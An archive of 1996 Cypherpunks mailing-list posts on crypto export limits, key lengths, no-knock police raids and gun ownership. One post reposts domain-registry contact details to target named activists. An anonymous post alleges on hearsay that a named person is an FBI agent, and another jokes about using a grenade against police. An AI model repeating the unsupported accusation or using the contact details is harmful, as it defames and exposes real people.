> 
> Threatening the states legitimacy is arguably more effective in
> influencing government behavior than blowing up federal office
> buildings.

The first step is to create at least a strong minority.  A handful of
cypherpunks can be largely ignored.  We have to get the general
public using and educated about strong crypto before civil disobedience
will mean anything.

-- 
You should only break rules of style if you can    | Tom Weinstein
coherently explain what you gain by so doing.      | tomw@netscape.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ante <ante@nemesis.meaning.com>
Date: Mon, 22 Jul 1996 12:31:17 +0800
To: cypherpunks@toad.com
Subject: evidence from the NIC - interpret and use as you will.
Message-ID: <199607220153.SAA29047@black.colossus.net>
MIME-Version: 1.0
Content-Type: text/plain


See who is sleeping with who. These are the supporters of the sham
"hearings".

Voters Telecomm Watch (VTW-DOM)
   115 Pacific St., #3
   Brooklyn, NY 11201

   Domain Name: VTW.ORG

   Administrative Contact:
      Safdar, Shabbir  (SS155)  shabbir@PANIX.COM
      (718) 596-7234
   Technical Contact, Zone Contact:
      Panix Network Information Center  (PANIX5)  hostmaster@panix.com
      +1 212 741 4400

   Record last updated on 27-Sep-95.
   Record created on 06-May-94.

   Domain servers in listed order:

   NS1.ACCESS.NET		198.7.0.1
   NS2.ACCESS.NET		198.7.0.2


The InterNIC Registration Services Host contains ONLY Internet Information
(Networks, ASN's, Domains, and POC's).
Please use the whois server at nic.ddn.mil for MILNET Information.

Blaze, Matt (CRYPTO-DOM)
   101 Crawford Corners Rd
   Room 4G-634
   Holmdel, NJ 07733

   Domain Name: CRYPTO.COM

   Administrative Contact:
      Blaze, Matt  (MB19)  mab@CRYPTO.COM
      (908) 949-8069
   Technical Contact, Zone Contact:
      Network Information and Support Center  (PSI-NISC)  hostinfo@psi.com
      (518) 283-8860

   Record last updated on 06-May-93.
   Record created on 06-May-93.

   Domain servers in listed order:

   NS.PSI.NET			192.33.4.10
   NS2.PSI.NET			38.8.50.2


The InterNIC Registration Services Host contains ONLY Internet Information
(Networks, ASN's, Domains, and POC's).
Please use the whois server at nic.ddn.mil for MILNET Information.

Center for Democracy and Technology (CDT2-DOM)
   1634 Eye Street, NW  Suite 1100
   Washington, DC 20006
   USA

   Domain Name: CDT.ORG

   Administrative Contact:
      Weitzner, Daniel  (DW151)  djw@CDT.ORG
      (202) 637-9800
   Technical Contact, Zone Contact:
      Palacios, Bob  (BP282)  bobpal@CDT.ORG
      (202) 637-9800
   Billing Contact:
      Kolb, Danielle  (DK1006)  dkolb@CDT.ORG
      (202) 637-9800

   Record last updated on 19-Apr-96.
   Record created on 20-Dec-94.

   Domain servers in listed order:

   NS.CAIS.COM			205.177.10.10
   NS2.CAIS.COM			199.0.216.1


The InterNIC Registration Services Host contains ONLY Internet Information
(Networks, ASN's, Domains, and POC's).
Please use the whois server at nic.ddn.mil for MILNET Information.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Mon, 22 Jul 1996 06:00:40 +0800
To: ichudov@algebra.com
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
In-Reply-To: <199607200134.UAA01969@manifold.algebra.com>
Message-ID: <Pine.BSF.3.91.960721185452.18960A-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain




On Fri, 19 Jul 1996 ichudov@algebra.com wrote:

> 
> It the voltage is 10000 volts, it is always fatal, right? And if you set
> good enough resistors, then the voltage for the human body itself would
> be much less than 10000V -- most of the voltage will be taken by resistors
> themselves.
> 

Dammit Jim, he's a lawyer - not an engineer!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Mon, 22 Jul 1996 12:17:37 +0800
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: A Snake-Oil FAQ
In-Reply-To: <v03007607ae1800d8c5b1@[192.187.162.15]>
Message-ID: <v03007803ae188f5668ca@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:05 PM -0700 7/21/96, Simon Spero wrote:
>[sorry Perry]
>
>On Sun, 21 Jul 1996, David Sternlight wrote:
>
>> So is your comment. What was broken was not public key, but a particular
>> key length (and by implication shorter ones). You can do that with just
>> about any system, even a one-time pad, by brute force, but it won't buy you
>
>Really? The only way I know of forcing a one-time pad is to use a hardware
>QM-based random number generator to generate every possible decrypt, thus
>creating a number of universes equal to the number of possible keys. Since
>you can't tell if you're universe is the right one, one should always
>verify the information obtained against a second source. IANAL, so I can't
>say if such a decrypt would count as probably cause.

Theoretically Simon is right. Nevertheless one-time pads have been broken
through trial and error when they have been reused either out of laziness
or force majeure.

It's not a "monkeys in the British Museum" problem, since when you hit the
right key sequences both encrypted text streams will fall cleanly
out--otherwise the chances are overwhelming (given a decently long run)
that one of the two streams will contain garbles or more likely be complete
gibberish.

It's a pretty simple computer program--all you need is a decent test for
plaintext so you don't have to examine most of the test decryptions.

David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Mon, 22 Jul 1996 05:43:28 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: ITAR's 40 bit limit
In-Reply-To: <199607210918.CAA01561@toad.com>
Message-ID: <Pine.LNX.3.94.960721185745.781C-100000@switch.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sun, 21 Jul 1996, Bill Stewart wrote:

> Date: Sun, 21 Jul 1996 02:16:38 -0700
> From: Bill Stewart <stewarts@ix.netcom.com>
> To: cypherpunks@toad.com
> Subject: Re: ITAR's 40 bit limit
> 
> At 07:45 PM 7/20/96 -0400, "David F. Ogren" <ogren@cris.com> wrote:
> >Another paradox of the US export regulations.
> >The NSA is allowing 40 bit crypto exports.  So as a hypothetical example 
> >assume that I write a crypto program that uses 40 bit RC4 to encode data 
> >(licensing from RSA).  I then get an export license using the accelerated 
> >process for 40 bit RC4.
> ........
> >However, what if she runs the program three times with three different 
> >passwords.  (Ignore the problems of Inner-CBC and Outer-CBC for now.)  Now 
> >the file is triple RC4 encoded with the equivalent of 80 bit security.  
> 
> Not always possible.  The rule isn't just "40 bit crypto" it's "permission,
> which you won't get with over 40 bits unless you're very cooperative."
> Applications like Netscape's SSL don't give you the ability to feed your
> data through it three times; they process your stream of data and send it.
> 

So whats to stop you from making a string of proxy servers?

 --Deviant


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMfJ95jAJap8fyDMVAQEtZAf/TfMVJOeHKNhuycoMz9/VreCA3Y/42/cv
NcHmz7+mv5MZd2M59kBEyahV8TBtxHB5iFHapKvhw+dUr620rBLVMiqbYYd4ZYST
EMAt8ZwgEHYkmCLp66qvTDglpjXK79ucTUORPXESGTzs68p300EB0OLCYg21M67M
9RQIgpe3nXgUMvKfxoNFh5rViyA2FNn+GfvNSxnFf9nK++6ClA823qyXe3uj4BKe
TIJ1N8H6FE9iUL1n8TM7qBDR67/HFHhNeyKfMVtelMWrdR38NbHdIFUjGNQzvLyI
WLHp7ERMqheD4rBdCjrtfquhNscOWHPtMSjEVPFhx92IeDYYxYgZeg==
=+ESF
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Wayne H. Allen" <whallen@capitalnet.com>
Date: Mon, 22 Jul 1996 09:24:32 +0800
To: cypherpunks@toad.com
Subject: Re: Length of passphrase beneficial?
Message-ID: <199607212302.TAA08173@ginger.capitalnet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 15:38 96.07.21 -0500, Adam Shostack wrote:
>
>Erle Greer wrote:


>	I think its a poor assumption that your home won't be searched
>if you're doing something that makes you want a 2048 bit key.

    Your kidding, because someone set up PGP to a large key your assuming
their doing wrong and the guy's going to get busted. Wow. I set up a long
key myself but never have used the silly thing, that mean I'm guilty too.
(Gotta go, a black helecopter just landed in the back yard)



>  A
>thousand bits of keylength should be good enough for most things that
>don't need to stay secret more than 5-10 years.
>

    Not if he keeps the passphrase to the key availiable to all. The original
poster did mention it was to only his wife at home who was a risk. A psudo-
random alph-nummeric key of the size he claims can't be memorized so it has
to be on the h-drive or a floppy.  He may as well fess up now to the Mrs before
she publishes all cause she's in.
Wayne H.Allen
whallen@capitalnet.com
Pgp key at www.capitalnet.com/~whallen





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Mon, 22 Jul 1996 05:32:58 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
In-Reply-To: <ae1574dc100210047571@[205.199.118.202]>
Message-ID: <Pine.BSF.3.91.960721185855.18960B-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> I again ask what was so wrong with the "You are surrounded. Come out with
> your hands up." routine of years past. Instead of anonymous ninjas in
> paramilitary black raiding a house and shooting anything that moves, use
> some "due process."
> 
> And "due process" is what it's about. Presentation of a warrant, or at
> least pretty careful announcement of identity. Blasting down doors without
> presentation of an arrest or search warrant is just not the American way.
> 
> Are there circumstances that can ever justify no-warning attacks? I suppose
> so, such as when clear evidence of, say, a bomb-making or terrorist cell is
> invovled. Neither condition was met at at either Ruby Ridge or Waco, nor in
> the vast number of midnight drug raids.

"No Knock" warrants came about in effort to limit the ability of the 
suspect to dispose of evidence - another result of the "war on drugs."
 - r.w.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Mon, 22 Jul 1996 12:07:57 +0800
To: "Mark M." <stewarts@ix.netcom.com>
Subject: Re: Netscape
In-Reply-To: <199607210918.FAA14603@quasar.voicenet.com>
Message-ID: <v03007804ae189101ccbb@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:42 AM -0700 7/21/96, Mark M. wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>On Sun, 21 Jul 1996, Bill Stewart wrote:
>
>> First of all, the goverrnment _has_ enforced ITAR; I've seen references
>> (ummm, on the net...) to a few cases of things like exporting TV decryptors,
>> as well as all the enforcement about illegal trafficking in guns and such.
>
>I haven't heard of anyone ever being indicted for exporting cryptography.  I
>should have made it clear that I was refering to ITAR as it applies to crypto,
>and not other items that would fall under ITAR.
>
>> But second, if you're threatened with jail and large fines, and have
>> to pay your lawyers lots of money to avoid being railroaded,
>> that's enforcement even if it's not the full-scale due process type.
>
>Quite true.  I was just refering to someone actually being tried and found
>guilty of violating ITAR by exporting cryptography.  I'd be very interested in
>any references to companies or individuals being prosecuted for exporting
>crypto.

Irrelevant. Why should they have to if nobody has done it and fessed up? A
law that is enforced because nobody is willing to violate it is just as
good as the kind where they shoot you after one overtime parking offense.
Better, because nobody gets shot.

David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Myers W. Carpenter" <BMCarpenter@trevecca.edu>
Date: Mon, 22 Jul 1996 09:59:21 +0800
To: Cypherpunks mailing list <cypherpunks@toad.com>
Subject: Credit Card to eCash
Message-ID: <v03007600ae1866520123@[205.219.251.54]>
MIME-Version: 1.0
Content-Type: text/plain


	What would be the problems in setting up a web site to make a
charge to a Credit Card/ATM card number and return Cash, like an ATM for
the net?
	I belive this would be a easy tool to promoat wider use of eCash.
Not everyone wants to go through setting up an account at Mark Twain or
whereever, just the advantages of a more cash like system.  With a few
sites like this around, and hopefully therefore more eCash in the wallets
of the public this could help to add to a critical mass to eCash and so on.
I don't think it would create the critical mass nessary for eCash's
success, but at least another log on the fire.
	anyway...
			myers






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Foley <paul@mycroft.actrix.gen.nz>
Date: Sun, 21 Jul 1996 19:32:44 +0800
To: cypherpunks@toad.com
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
In-Reply-To: <199607201438.KAA07420@jekyll.piermont.com>
Message-ID: <199607210716.TAA09432@mycroft.actrix.gen.nz>
MIME-Version: 1.0
Content-Type: text/plain


"Perry E. Metzger" <perry@piermont.com> wrote:

   The opening in the barrel of just about every rifle or pistol I've
   looked at seems to be about half an inch or less. Perhaps you have
   been looking at the 18" guns on the battleship "New Jersey"?

   Perry

They'd be 16" guns.  I think only the Japanese had a battleship with 18
inchers.

-- 
Paul Foley <mycroft@actrix.gen.nz>       ---         PGPmail preferred

	   PGP key ID 0x1CA3386D available from keyservers
    fingerprint = 4A 76 83 D8 99 BC ED 33  C5 02 81 C9 BF 7A 91 E8
----------------------------------------------------------------------
"Outside of a dog, a book is a man's best friend: and inside a dog,
it's too dark to read."
		-- Groucho Marx




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Mon, 22 Jul 1996 05:53:16 +0800
To: Dmitri Chesnokov <chesnok@manifold.algebra.com>
Subject: Re: Thanks to Prof. Sternlight for postings to CYPHERPUNKS
In-Reply-To: <199607200538.AAA07597@manifold.algebra.com>
Message-ID: <Pine.BSF.3.91.960721192209.18960C-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain



On Sat, 20 Jul 1996, Dmitri Chesnokov wrote:

> 
> Dr. David Sternlight is undoubtedly one of the best experts in
> cryptography and Government Information Policy, who is generous enough
> to share his observations with us. We should thank you, David, for
> taking your time and helping Cypherpunks to reach new heights in our
> understanding of what should be the proper role of the government.
> Please continue posting to our mailing list. There are people who are
> interested in your views!
> 

ROFLMAO

O.K. Perry - I'll take the pledge

I (state your name) will not feed the Fud.

- r.w.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Mon, 22 Jul 1996 15:21:43 +0800
To: ichudov@algebra.com
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
In-Reply-To: <199607220111.UAA19079@manifold.algebra.com>
Message-ID: <Pine.SUN.3.91.960721191416.11723B-100000@crl2.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Sun, 21 Jul 1996 ichudov@algebra.com wrote:

> Lots of kids impulsively do things that they later regret. Like, once
> one little boy hit me hard in the head with a heavy stick from behind
> my back...Now, if he or myself had access to a firearm, the life now
> would not be nearly as good as it is.
> 
> I've seen these sudden destructive impulses in kids many times.

So have I, but your assertion begs the question.  In an unarmed
society, people don't have to curb their impulse to the extent
they do in an armed one.  As a result they often don't.  The
Swiss and the Israelis seem to avoid internecine fratricide, even
though guns are everywhere.  I don't think it is any coincidence
that incivility and casual violence have increased in America in
direct proportion to the ongoing orgy of victim disarmament.

I've noticed that most civil and human interactions occur in gun
stores and rifle ranges.  I've been treated shabbily in health
food stores, but never at a gun show.  When was the last time
you heard of someone being killed at the shooting range or in a
gun store?  It's statistically infinitesimal.  Now ask yourself
the same question about liquor and convenience stores...

Powerlessness is far more a cause of impulsive rages than the
trust, responsibility and empowerment engendered by gun ownership.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jean-Paul Kroepfli <JeanPaul.Kroepfli@ns.fnet.fr>
Date: Mon, 22 Jul 1996 04:10:25 +0800
To: "'Deranged Mutant'" <WlkngOwl@unix.asb.com>
Subject: Re: Snake Oil FAQ
Message-ID: <01BB773E.9AA1E700@JPKroepsli.S-IP.EUnet.fr>
MIME-Version: 1.0
Content-Type: text/plain


Very good idea, and nice implemantation of the idea.
Please, let us know of the new version.
Would be a minimal information about cyphering vs scrambling, secret vs public key system, useful for the newbies and not redondant with the large classical FAQ.
Best regards,
Jean-Paul
~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-
Jean-Paul et Micheline Kroepfli      (our son: Nicolas and daughter: Celine)
eMail: JeanPaul.Kroepfli@utopia.fnet.fr    Also Compuserve and MSNetwork
Phone: +33  81 55 52 59  (F)          PostMail: F-25640 Breconchaux (France)
   or: +41  21 843 27 36 (CH)               or: CP 138, CH-1337 Vallorbe
  Fax: +33  81 55 52 62                                        (Switzerland)
Zephyr(r) : InterNet Communication and Commerce, Security and Cryptography consulting
PGP Fingerprint : 19 FB 67 EA 20 70 53 89  AF B2 5C 7F 02 1F CA 8F
"The InterNet is the most open standard since air for breathing"






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Mon, 22 Jul 1996 15:18:49 +0800
To: Tom Weinstein <tomw@netscape.com>
Subject: Re: Netscape
In-Reply-To: <31F2DBAE.41C6@netscape.com>
Message-ID: <Pine.SUN.3.91.960721193739.11723C-100000@crl2.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Sun, 21 Jul 1996, Tom Weinstein wrote:

> What I object to is anonymous activists who perform acts at no risk to
> themselves which make it harder for those of us who are trying to bring
> strong crypto to everyone.

Personally, I think it was a good idea for the American Colonists
to shoot at the British from behind rocks and trees.  As Tom
pointed out in his post, there are relatively few Cypherpunks.
We all do what we can, in whatever way best suits are temprament,
talents and acceptible risk level.  There is no single tao; there 
are many paths.  For Netscape, dialog and negotiations may be the 
best way to promote privacy, for Zimmermann, it was guerilla 
programming, for others it might be high-tech monkey-wrenching.  
To each his own.  As far as I can see, they are all trying to 
bring strong crypto to everyone.


 S a n d y

P.S.	I want to make it clear that I have the greatest
	respect for Tom and Netscape's contributions in
	support of strong crypto.  

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Mon, 22 Jul 1996 11:27:18 +0800
To: ecgwulf@postoffice.worldnet.att.net (Llywarch Hen)
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
In-Reply-To: <2.2.16.19960722004904.1a3fece0@postoffice.worldnet.att.net>
Message-ID: <199607220111.UAA19079@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Llywarch Hen wrote:
> In these parts most guns seemed to be used by the temporarily depressed
> teenaged children of gun owners. One kid managed to live as a vegetable
> having successfully removed the source of his unhappiness -- his brain.
> Tough luck. Pretty hard to aim properly when you are upset. Lesson: keep
> your cool.

I promised that when I have children I will not have guns at home. I
think that for me the danger outweighs the benefit. I would explain them
basic gun safety and how to shoot though, but would not keep guns around
them for any long period of time.

Lots of kids impulsively do things that they later regret. Like, once
one little boy hit me hard in the head with a heavy stick from behind
my back. I have never met him before, never even talked to him and never
angered him. He was 3-4 years younger than me so obviously he did not do
it because he was a bully. After he did it he was really sorry and no
one including his mom could explain why he did it. Thanks to his mom
who prevented me from beating the shit out of him.

Now, if he or myself had access to a firearm, the life now would not
be nearly as good as it is.

I've seen these sudden destructive impulses in kids many times.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Mon, 22 Jul 1996 14:44:24 +0800
To: cypherpunks@toad.com
Subject: Re: A Snake-Oil FAQ
In-Reply-To: <L4qFRD5w165w@bwalk.dm.com>
Message-ID: <199607220119.UAA19143@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


To all who do not like to read Sternlight and anything about him:
the following procmail recipe will solve all problems easily.

:0 B
* ^TOcypherpunks
* Sternlight
/dev/null

This is much easier than trying to organize boycotts, etc.

Saves lots of bandwidth too.

Honestly, this boycott campaign looks out of place on Cypherpunks, at
least to me. I mean, we are for freedom of speech, aren't we?
Sternlight is talking about on-topic things. How come that renowned
defenders of freedom of speech resorted to name calling and attempts to
push their opponent out of the public forum?

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Weinstein <tomw@netscape.com>
Date: Mon, 22 Jul 1996 14:49:06 +0800
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: Netscape
In-Reply-To: <Pine.SUN.3.91.960721193739.11723C-100000@crl2.crl.com>
Message-ID: <31F2F40D.167E@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Sandy Sandfort wrote:
> 
> On Sun, 21 Jul 1996, Tom Weinstein wrote:
> 
>> What I object to is anonymous activists who perform acts at no risk
>> to themselves which make it harder for those of us who are trying to
>> bring strong crypto to everyone.
> 
> Personally, I think it was a good idea for the American Colonists
> to shoot at the British from behind rocks and trees.  As Tom
> pointed out in his post, there are relatively few Cypherpunks.
> We all do what we can, in whatever way best suits are temprament,
> talents and acceptible risk level.  There is no single tao; there
> are many paths.  For Netscape, dialog and negotiations may be the
> best way to promote privacy, for Zimmermann, it was guerilla
> programming, for others it might be high-tech monkey-wrenching.
> To each his own.  As far as I can see, they are all trying to
> bring strong crypto to everyone.

I agree with you 100%.  Note that while the American Colonists were
shooting at the British, they didn't take their friends and pin them to
trees as decoys.

-- 
You should only break rules of style if you can    | Tom Weinstein
coherently explain what you gain by so doing.      | tomw@netscape.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Mon, 22 Jul 1996 10:43:36 +0800
To: whallen@capitalnet.com (Wayne H. Allen)
Subject: Re: Length of passphrase beneficial?
In-Reply-To: <199607212302.TAA08173@ginger.capitalnet.com>
Message-ID: <199607220125.UAA21460@homeport.org>
MIME-Version: 1.0
Content-Type: text


Wayne H. Allen wrote:

| At 15:38 96.07.21 -0500, Adam Shostack wrote:
| >
| >Erle Greer wrote:
| 
| 
| >	I think its a poor assumption that your home won't be searched
| >if you're doing something that makes you want a 2048 bit key.
| 
|     Your kidding, because someone set up PGP to a large key your assuming
| their doing wrong and the guy's going to get busted. Wow. I set up a long
| key myself but never have used the silly thing, that mean I'm guilty too.
| (Gotta go, a black helecopter just landed in the back yard)

	No, I said 'home won't be searched.'  I don't know why you
assumed that I meant the LEAs would get a warrant and bust somone.  If
you want a 2048 bit key because it makes you feel warm and fuzzy,
fine.  If you're also using a random passphrase, I think its fair to
assume that you have a threat in mind.

| >  A
| >thousand bits of keylength should be good enough for most things that
| >don't need to stay secret more than 5-10 years.
| >

|     Not if he keeps the passphrase to the key availiable to all. The original
| poster did mention it was to only his wife at home who was a risk. A psudo-
| random alph-nummeric key of the size he claims can't be memorized so it has

	I disagreed with that assesment.  Breaking into a home is easy.

Adam



-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Mon, 22 Jul 1996 13:03:08 +0800
To: Elliot Lee <sopwith@redhat.com>
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
In-Reply-To: <Pine.LNX.3.93.960720010145.27788A-100000@redhat.com>
Message-ID: <Pine.LNX.3.93.960721202328.130B-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 20 Jul 1996, Elliot Lee wrote:
> 
> IOW, if a 'pre-dawn unannounced ninja raid' [sic] occurs on you, you are
> pretty well beat, if only because the other side knows what they are doing
> and you have no idea of their plans.
> The only protection against lawlessness is not lawlessness, it is reason.

     I'm probably starting to sound a little bellish on this, but that is 
why I suggested (only half in jest) the hand gernade. 

     A pyrrhic victory is still a victory.

     Of course I am a little nuts. 

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Mon, 22 Jul 1996 12:54:16 +0800
To: David Sternlight <david@sternlight.com>
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
In-Reply-To: <v03007605ae1623952449@[192.187.162.15]>
Message-ID: <Pine.LNX.3.93.960721203319.130E-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 19 Jul 1996, David Sternlight wrote:
> At 1:49 AM -0700 7/20/96, Timothy C. May wrote:
> >At 6:42 AM 7/19/96, snow wrote:
> >>On Thu, 18 Jul 1996, Doug Hughes wrote:
> >>> If people break into my house with the element of surprise wearing
> >>> all black in the middle of the night, they have the element of surprise
> >>>  If you don't reach for a gun, at least you have the 'chance' for
> >>> restitution on your side. If you're dead, you have no options.
> >>     If you are trained a certain way, you _are_ going to reach for
> >Snow is absolutely right! Surprised in the night, with no clear
> >identification of the entrants (and yelled "Police!!" claims are used by
> >home invaders, so I would not trust this anyway), a trained person will
> >instinctively reach for his weapon.
> Probably something to do with flushing dope down the toilet, or destroying
> evidence. Perhaps it's too much to expect them to disconnect the sewer line
> and hit your interior with a water hose and an electricity cut-off before
> raiding it.

     Of course escalating a war against your own citizens makes more sense 
than legalizie the crap and letting the idiots die. 

     After all, big brudder has the right to control the substances I put 
into my boddy.

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Mon, 22 Jul 1996 13:11:07 +0800
To: Llywarch Hen <ecgwulf@worldnet.att.net>
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
In-Reply-To: <2.2.16.19960720081320.2427098c@postoffice.worldnet.att.net>
Message-ID: <Pine.LNX.3.93.960721203756.130G-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain



Worldnet, We're _worse_ than AOL. 

On Sat, 20 Jul 1996, Llywarch Hen wrote:
> Timothy C. May wrote:
> >If a black-clad ninja enters my house without warning, I'll have to react
> >the only way I know how, by reaching for my gun. I don't have the luxury of
> >freezing, exposing my neck (wolf-style), and hoping that the ninjas are
> >"just" the police.
> Sir, you are not allowing for just how incredibly stupid the cops are. When
> they show up at your house, it is all over. They've already decided that you
> are scum. You'd have us believe that you lie awake stroking your gun. You

     You are showing your ignorance of training. 

> 'black-clad' indeed. The one 'black-clad' character that comes to mind is

     You never paid much attention to a swat team have you? Entry teams 
routinely wear black, it is more intimidating and doesn't show blood all 
that well. 

> the _Economist_ editor found dead last year on his kitchen table wearing a
> tight-fitting latex number who expired having sex with him/itself. Of course
> this says nothing about the _Economist's_ readership, except most likely in
> your case.

     What a person does in the privacy of their kitchen is no concern of 
anyone else. 


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Mon, 22 Jul 1996 13:49:33 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
In-Reply-To: <199607201438.KAA07420@jekyll.piermont.com>
Message-ID: <Pine.LNX.3.93.960721204829.130I-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 20 Jul 1996, Perry E. Metzger wrote:
> Llywarch Hen writes:
> > You have not had the opportunity to look closely at the business end
> > of a gun.  The hole looks enormous.
> The opening in the barrel of just about every rifle or pistol I've
> looked at seems to be about half an inch or less. Perhaps you have
> been looking at the 18" guns on the battleship "New Jersey"?

     The towed 155's from the ANG unit I was in during college were 
pretty big, but it is awful hard to hit a single person at less than 300 
yards. 
     A 12 guage looks a lot bigger 3 inches from your nose than 3 feet 
away, but I'd rather have a hostile hold it 3 inches from my nose than 
3 feet away. 

     If you don't understand why, go talk to a _serious_ martial arts
type.

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@zifi.genetics.utah.edu (Anonymous)
Date: Mon, 22 Jul 1996 15:22:49 +0800
To: cypherpunks@toad.com
Subject: the VTW---FBI Connection
Message-ID: <199607220251.UAA02057@zifi.genetics.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain


We have received information that VTW is run and supported by the FBI,
which we have suspected for reasons listed here.

I) They appear to have no financial support or funding source. They
do not accept donations. They have no corporate funds. And yet they
appear to be a thriving business.

II) They are secretive about their location, and do not seem to have
a headquarters. The address listed in the NIC is a vacant lot in of
all places Brooklyn, NY. They do not have a listed telephone.

III) On a tip from a "friend" we learned that the power leader behind VTW
is a cleancut man with the unusual name "Shabbir M. Safdar." Not exactly
a common name. Several people say they've met him. Our "friend" says
that Mr. Safdar is in reality an agent of the FBI.

IIII) We didn't believe this without external verification. So we called
the Brooklyn office of the FBI and asked for Agent Safdar. No such person.
I called the Washington office. No such person. Checked if there is
any agent named Safdar. They don't give out this info. Then we tried to find
ANY public records on a Safdar, with no luck. No driver's license in NY, DC, NJ,
etc. No phone, etc. Odd that such a person does not exist and yet runs a
"human rights" organization? Then Alice called the NY FBI office. Asked for
Agent Safdar. Guess what? "He's not in. Can I take a message". No message,
thanks. He'll get the message all right.

Now the big question: What is the FBI trying to do getting all these
names? What else has "VTW" been doing? And what other organizations like
them are there? Who else is in on it? What does this say about EPIC, CDT, EFF?
Are Blaze and Schneier dupes, or willing participants? What about their
ISP? I think we are all owed an explanation. This is serious. Maybe FOIA or
a lawsuit before they burn the files.

What do you want to bet "VTW" quietly fades away after a few prefunctory
denials, and gets replaced by another organization in due course?

Faithfully,

Net reporter team Alice and Bob




